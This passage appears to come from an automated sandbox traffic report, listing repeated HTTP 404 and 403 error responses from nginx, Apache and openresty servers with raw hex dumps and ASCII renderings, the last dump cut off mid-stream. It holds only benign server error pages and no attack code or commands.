Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:06 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:09 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:12 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+\|OX)@OG>Wr~b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:30:14 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 34 77 63 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /4wc1/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:31:31 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:31:36 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc 